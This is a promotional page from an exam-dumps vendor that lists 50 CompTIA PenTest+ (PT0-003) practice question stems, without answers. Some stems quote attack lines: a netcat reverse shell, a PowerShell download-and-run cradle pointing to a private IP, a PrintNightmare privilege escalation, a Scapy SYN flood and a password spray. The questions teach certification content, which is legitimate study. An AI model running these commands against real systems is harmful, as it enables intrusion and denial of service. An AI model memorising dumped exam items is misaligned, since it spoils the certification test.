Visit PT0-003 Free Dumps (Part 2, Q41-Q90) of V10.02 to Verify the Quality: Crush the CompTIA PenTest+ Certification Exam with DumpsBase’s Latest Dumps

When preparing for the CompTIA PenTest+ certification to start your career in penetration testing, make sure that you have the proper study materials. DumpsBase’s PT0-003 dumps (V10.02) should be the best preparation tool for success. Because DumpsBase PT0-003 dumps integrate depth, accuracy, and relevance, they are unique. When reading the PT0-003 free dumps (Part 1, Q1-Q40) of V10.02, you can find that those are not arbitrary question sets; rather, they are created from practice exams with updated questions and answers that closely resemble the actual exam. With DumpsBase’s PT0-003 dumps (V10.02), you can become familiar with the format and kinds of questions you’ll encounter. Additionally, you can self-test, pinpoint your areas of weakness, and improve your comprehension with the help of PT0-003 exam questions and answers, preventing any surprises on test day. Today, more demos are being shared online to help you verify the V10.02 before downloading.

Below are the PT0-003 free dumps (Part 2, Q41-Q90) of V10.02 online; read them to verify the quality:

1. During a vulnerability assessment, a penetration tester configures the scanner sensor and performs the initial vulnerability scanning under the client's internal network. The tester later discusses the results with the client, but the client does not accept the results. The client indicates the host and assets that were within scope are not included in the vulnerability scan results.

Which of the following should the tester have done?

2. Which of the following describes the process of determining why a vulnerability scanner is not providing results?

3. During a security audit, a penetration tester wants to run a process to gather information about a target network's domain structure and associated IP addresses.

Which of the following tools should the tester use?

4. During an external penetration test, a tester receives the following output from a tool:

test.comptia.org

info.comptia.org

vpn.comptia.org

exam.comptia.org

Which of the following commands did the tester most likely run to get these results?

5. A penetration tester is developing the rules of engagement for a potential client.

Which of the following would most likely be a function of the rules of engagement?

6. A penetration tester needs to complete cleanup activities from the testing lead.

Which of the following should the tester do to validate that reverse shell payloads are no longer running?

7. A penetration testing team wants to conduct DNS lookups for a set of targets provided by the client.

The team crafts a Bash script for this task.

However, they find a minor error in one line of the script:

1 #!/bin/bash

2 for i in $(cat example.txt); do

3 curl $i

4 done

Which of the following changes should the team make to line 3 of the script?

8. A penetration tester needs to test a very large number of URLs for public access.

Given the following code snippet:

1 import requests

2 import pathlib

3

4 for url in pathlib.Path("urls.txt").read_text().split("\n"):

5     response = requests.get(url)

6     if response.status == 401:

7         print("URL accessible")

Which of the following changes is required?

9. As part of an engagement, a penetration tester wants to maintain access to a compromised system after rebooting.

Which of the following techniques would be best for the tester to use?

10. In a file stored in an unprotected source code repository, a penetration tester discovers the following line of code:

sshpass -p donotchange ssh [email protected]

Which of the following should the tester attempt to do next to take advantage of this information? (Select two).

11. During a security assessment for an internal corporate network, a penetration tester wants to gain unauthorized access to internal resources by executing an attack that uses software to disguise itself as legitimate software.

Which of the following host-based attacks should the tester use?

12. A penetration tester assesses a complex web application and wants to explore potential security weaknesses by searching for subdomains that might have existed in the past.

Which of the following tools should the penetration tester use?

13. During the reconnaissance phase, a penetration tester collected the following information from the DNS records:

A-----> www

A-----> host

TXT --> vpn.comptia.org

SPF---> ip =2.2.2.2

Which of the following DNS records should be in place to avoid phishing attacks using spoofing domain techniques?

14. A penetration tester discovers data to stage and exfiltrate. The client has authorized movement to the tester's attacking hosts only.

Which of the following would be most appropriate to avoid alerting the SOC?

15. A penetration tester gains access to a domain server and wants to enumerate the systems within the domain.

Which of the following tools would provide the best oversight of domains?

16. A penetration tester plans to conduct reconnaissance during an engagement using readily available resources.

Which of the following resources would most likely identify hardware and software being utilized by the client?

17. During an assessment, a penetration tester manages to get RDP access via a low-privilege user.

The tester attempts to escalate privileges by running the following commands:

Import-Module .\PrintNightmare.ps1

Invoke-Nightmare -NewUser "hacker" -NewPassword "Password123!" -DriverName "Print"

The tester attempts to further enumerate the host with the new administrative privileges by using the runas command. However, the access level is still low.

Which of the following actions should the penetration tester take next?

18. A tester is performing an external phishing assessment on the top executives at a company. Two-factor authentication is enabled on the executives’ accounts that are in the scope of work.

Which of the following should the tester do to get access to these accounts?

19. A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability.

The tester uses the following command:

nc -e /bin/sh 10.10.10.16 4444

Which of the following would most likely bypass the filtered space character?

20. A penetration tester needs to identify all vulnerable input fields on a customer website.

Which of the following tools would be best suited to complete this request?

21. A penetration tester enumerates a legacy Windows host on the same subnet. The tester needs to select exploit methods that will have the least impact on the host's operating stability.

Which of the following commands should the tester try first?

22. A penetration tester executes multiple enumeration commands to find a path to escalate privileges.

Given the following command:

find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

Which of the following is the penetration tester attempting to enumerate?

23. A penetration tester creates a list of target domains that require further enumeration.

The tester writes the following script to perform vulnerability scanning across the domains:

line 1: #!/usr/bin/bash

line 2: DOMAINS_LIST = "/path/to/list.txt"

line 3: while read -r i; do

line 4: nikto -h $i -o scan-$i.txt &

line 5: done

The script does not work as intended.

Which of the following should the tester do to fix the script?

24. Given the following script:

$1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split("\")[1]

If ($1 -eq "administrator") {

echo IEX(New-Object Net.WebClient).Downloadstring('http://10.10.11.12:8080/ul/windows.ps1') | powershell -noprofile -

}

Which of the following is the penetration tester most likely trying to do?

25. A penetration tester completed OSINT work and needs to identify all subdomains for mydomain.com.

Which of the following is the best command for the tester to use?

26. While performing an internal assessment, a tester uses the following command:

crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@

Which of the following is the main purpose of the command?

27. A penetration tester gains access to a Windows machine and wants to further enumerate users with native operating system credentials.

Which of the following should the tester use?

28. Which of the following is a term used to describe a situation in which a penetration tester bypasses physical access controls and gains access to a facility by entering at the same time as an employee?

29. A penetration tester is authorized to perform a DoS attack against a host on a network.

Given the following input:

ip = IP("192.168.50.2")

tcp = TCP(sport=RandShort(), dport=80, flags="S")

raw = RAW(b"X"*1024)

p = ip/tcp/raw

send(p, loop=1, verbose=0)

Which of the following attack types is most likely being used in the test?

30. Which of the following tasks would ensure the key outputs from a penetration test are not lost as part of the cleanup and restoration activities?

31. During a security assessment, a penetration tester needs to exploit a vulnerability in a wireless network's authentication mechanism to gain unauthorized access to the network.

Which of the following attacks would the tester most likely perform to gain access?

32. A penetration tester is testing a power plant's network and needs to avoid disruption to the grid.

Which of the following methods is most appropriate to identify vulnerabilities in the network?

33. A penetration tester finished a security scan and uncovered numerous vulnerabilities on several hosts.

Based on the targets' EPSS and CVSS scores, which of the following targets is the most likely to get attacked?

Host | CVSS | EPSS

34. A penetration tester discovers evidence of an advanced persistent threat on the network that is being tested.

Which of the following should the tester do next?

35. A penetration tester needs to evaluate the order in which the next systems will be selected for testing.

Given the following output:

Hostname | IP address | CVSS 2.0 | EPSS

hrdatabase | 192.168.20.55 | 9.9 | 0.50

financesite | 192.168.15.99 | 8.0 | 0.01

legaldatabase | 192.168.10.2 | 8.2 | 0.60

fileserver | 192.168.125.7 | 7.6 | 0.90

Which of the following targets should the tester select next?

36. During an engagement, a penetration tester wants to enumerate users from Linux systems by using finger and rwho commands. However, the tester realizes these commands alone will not achieve the desired result.

Which of the following is the best tool to use for this task?

37. A penetration tester wants to check the security awareness of specific workers in the company with targeted attacks.

Which of the following attacks should the penetration tester perform?

38. A penetration tester wants to create a malicious QR code to assist with a physical security assessment.

Which of the following tools has the built-in functionality most likely needed for this task?

39. A penetration tester needs to help create a threat model of a custom application.

Which of the following is the most likely framework the tester will use?

40. During a penetration test, a tester attempts to pivot from one Windows 10 system to another Windows system. The penetration tester thinks a local firewall is blocking connections.

Which of the following command-line utilities built into Windows is most likely to disable the firewall?

41. A penetration tester is performing network reconnaissance. The tester wants to gather information about the network without causing detection mechanisms to flag the reconnaissance activities.

Which of the following techniques should the tester use?

42. After a recent penetration test was conducted by the company's penetration testing team, a systems administrator notices the following in the logs:

2/10/2023 05:50AM C:\users\mgranite\schtasks /query

2/10/2023 05:53AM C:\users\mgranite\schtasks /CREATE /SC DAILY

Which of the following best explains the team's objective?

43. A penetration tester is conducting a vulnerability scan. The tester wants to see any vulnerabilities that may be visible from outside of the organization.

Which of the following scans should the penetration tester perform?

44. A penetration tester gains initial access to a target system by exploiting a recent RCE vulnerability. The patch for the vulnerability will be deployed at the end of the week.

Which of the following utilities would allow the tester to reenter the system remotely after the patch has been deployed? (Select two).

45. A penetration tester is conducting reconnaissance for an upcoming assessment of a large corporate client. The client authorized spear phishing in the rules of engagement.

Which of the following should the tester do first when developing the phishing campaign?

46. A penetration tester established an initial compromise on a host. The tester wants to pivot to other targets and set up an appropriate relay. The tester needs to enumerate through the compromised host as a relay from the tester's machine.

Which of the following commands should the tester use to do this task from the tester's host?

47. A penetration tester needs to confirm the version number of a client's web application server.

Which of the following techniques should the penetration tester use?

48. While conducting a peer review for a recent assessment, a penetration tester finds the debugging mode is still enabled for the production system.

Which of the following is most likely responsible for this observation?

49. A tester runs an Nmap scan against a Windows server and receives the following results:

Nmap scan report for win_dns.local (10.0.0.5)

Host is up (0.014s latency)

Port State Service

53/tcp open domain

161/tcp open snmp

445/tcp open smb-ds

3389/tcp open rdp

Which of the following TCP ports should be prioritized for using hash-based relays?

50. During an assessment, a penetration tester runs the following command:

setspn.exe -Q /

Which of the following attacks is the penetration tester preparing for?


 
